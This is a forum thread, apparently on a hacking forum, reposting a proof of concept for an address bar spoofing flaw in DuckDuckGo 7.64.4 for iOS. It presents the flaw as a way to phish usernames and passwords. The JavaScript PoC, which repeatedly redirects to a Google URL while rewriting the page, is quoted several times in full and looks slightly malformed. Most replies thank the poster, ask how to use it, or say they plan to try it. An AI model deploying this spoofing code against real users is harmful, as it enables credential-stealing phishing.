DuckDuckGo 7.64.4 Address Bar Spoofing Vulnerability

CmdData · 4 Ara 2021

Kod:

#Vulnerability: Address Bar Spoofing Vulnerability
Product: DuckDuckGo
#Version: 7.64.4
#Impact: Moderate
 
 
*Description*
 
DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"
vulnerability due to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.
 
 
 
*Proof of Concept (POC)*
 
Following is the POC that could be used to reproduce the issue:
 
<script>
    function spoof(){
    location="https://www.google.com/csi?random="+Math.random();
    document.body.innerHTML='This is not Google!';("This is not google.com
</h1>");}
</script>
<input type="button" value="Run"
onclick="setInterval("spoof()",20);"/>
 
 
 
*Impact*
 
The issue could be abused to carry out more effective phishing attacks
against it's users.

Greenafro · 4 Ara 2021

thank you good sir

MadRoxx · 4 Ara 2021

i didn't understand what i correctly does could you explain to me

likelive · 4 Ara 2021

whats wrong with that ?

Alphatomix · 5 Ara 2021

Thanks for sharing man! DuckDuckGo been around for forever it feels like didnt see this around

lostguggig · 5 Ara 2021

I'm needing this.

DJUnknow · 5 Ara 2021

CmdData' Alıntı:

Kod:

#Vulnerability: Address Bar Spoofing Vulnerability
Product: DuckDuckGo
#Version: 7.64.4
#Impact: Moderate
 
 
*Description*
 
DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"
vulnerability due to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.
 
 
 
*Proof of Concept (POC)*
 
Following is the POC that could be used to reproduce the issue:
 
<script>
    function spoof(){
    location="https://www.google.com/csi?random="+Math.random();
    document.body.innerHTML='This is not Google!';("This is not google.com
</h1>");}
</script>
<input type="button" value="Run"
onclick="setInterval("spoof()",20);"/>
 
 
 
*Impact*
 
The issue could be abused to carry out more effective phishing attacks
against it's users.

tall me plz how to use this.

mehmett21 · 5 Ara 2021

Thanks brother useful.

symond10 · 5 Ara 2021

CmdData' Alıntı:

Kod:

#Vulnerability: Address Bar Spoofing Vulnerability
Product: DuckDuckGo
#Version: 7.64.4
#Impact: Moderate
 
 
*Description*
 
DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"
vulnerability due to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.
 
 
 
*Proof of Concept (POC)*
 
Following is the POC that could be used to reproduce the issue:
 
<script>
    function spoof(){
    location="https://www.google.com/csi?random="+Math.random();
    document.body.innerHTML='This is not Google!';("This is not google.com
</h1>");}
</script>
<input type="button" value="Run"
onclick="setInterval("spoof()",20);"/>
 
 
 
*Impact*
 
The issue could be abused to carry out more effective phishing attacks
against it's users.

Is this the latest one? Thanks for sharing

MuhammadIshaq · 5 Ara 2021

wow thx for this one

freecheat001 · 5 Ara 2021

finally nc bro

Moaaz0098 · 5 Ara 2021

i ll try it thx a lot hop its working

fatburger · 6 Ara 2021

thanks bro usefull

haroldt · 21 Ara 2021

this is great, thanks bro

pudelworrior · 12 Ocak 2022

let me try this

kodratdz · 12 Ocak 2022

i need video tutorial

kevingumatin · 28 Mar 2022

thanks for this ill make sure to test it out and give update

gospodbog69 · 28 Mar 2022

txh sir good djob

Barebyxa · 6 Nis 2022

thx has been looking for a long time

DuckDuckGo 7.64.4 Address Bar Spoofing Vulnerability

CmdData

Greenafro

MadRoxx

likelive

Alphatomix

Shinigami

lostguggig

DJUnknow

Why so Serious

mehmett21

symond10

MuhammadIshaq

𝕄𝕒𝕤𝕥𝕖𝕣 𝕠𝕗 𝕎𝕒𝕥𝕔𝕙

freecheat001

Moaaz0098

Bad Boy

fatburger

haroldt

pudelworrior

kodratdz

kevingumatin

gospodbog69

Barebyxa

ABOBA

Benzer Konular

DuckDuckGo 7.64.4 Address Bar Spoofing Vulnerability

Shinigami

Why so Serious

𝕄𝕒𝕤𝕥𝕖𝕣 𝕠𝕗 𝕎𝕒𝕥𝕔𝕙

Bad Boy

ABOBA

Benzer Konular

Privacy & Transparency

Privacy & Transparency